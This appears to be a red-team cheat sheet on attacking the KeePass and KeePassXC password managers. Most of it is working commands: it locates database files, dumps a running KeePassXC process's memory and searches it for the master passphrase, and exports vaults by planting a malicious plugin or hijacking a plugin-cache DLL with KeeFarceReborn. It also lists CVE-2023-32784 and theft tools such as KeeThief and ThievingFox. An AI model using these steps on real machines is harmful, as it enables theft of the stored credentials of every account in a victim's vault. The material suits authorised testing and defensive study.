KeePass
Enumerate DB locations:
Cmd > type %APPDATA%\KeePass\KeePass.config.xml | findstr "<Path>"
KeePassXC
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item "C:\Program Files\KeePassXC\KeePassXC.exe")).FileVersion
Extract Passphrase from Memory
Using strings2:
PS > .\strings2.exe -pid (Get-Process KeePassXC) -a -wide > KeePassXC_strings.txt
PS > gc .\KeePassXC_strings.txt | Select-String -Pattern "Passw0"
PS > (gc .\KeePassXC_strings.txt).length
PS > (gc .\KeePassXC_strings.txt).length / 1mb
Using Get-ProcessStrings
from PowerShellArsenal/MemoryTools:
PS > Get-ProcessStrings -Id 1337 | Out-File KeePassXC_strings.txt
$ dos2unix KeePassXC_strings.txt
$ cat KeePassXC_strings.txt | awk '{print $3}' | grep -x '.\{5,30\}' > words
DLL Hijacking
Extract Passphrase from Memory (< v2.53.1)
CVE-2023-32784
Abusing KeePass Triggers (< v2.54)
Tools
KeeFarce
KeeFarceReborn
Abusing the KeePass Plugin Cache
Export DB by compiling and loading a malicious plugin (requires admin's privileges to place the .plgx
file):
Cmd > KeePass.exe --plgx-create C:\KeeFarceReborn\KeeFarceRebornPlugin
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin.plgx "C:\Program Files\KeePass Password Safe 2\Plugins"
Export DB by hijacking a legit plugin DLL (requires an existent plugin in use):
Cmd > copy "C:\Program Files\KeePass Password Safe 2\KeePass.exe" .
Cmd > devenv /build Release KeeFarceRebornPlugin.sln
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll
KeePassHax
KeeThief
CrackMapExec
KeePwn
ThievingFox
Last updated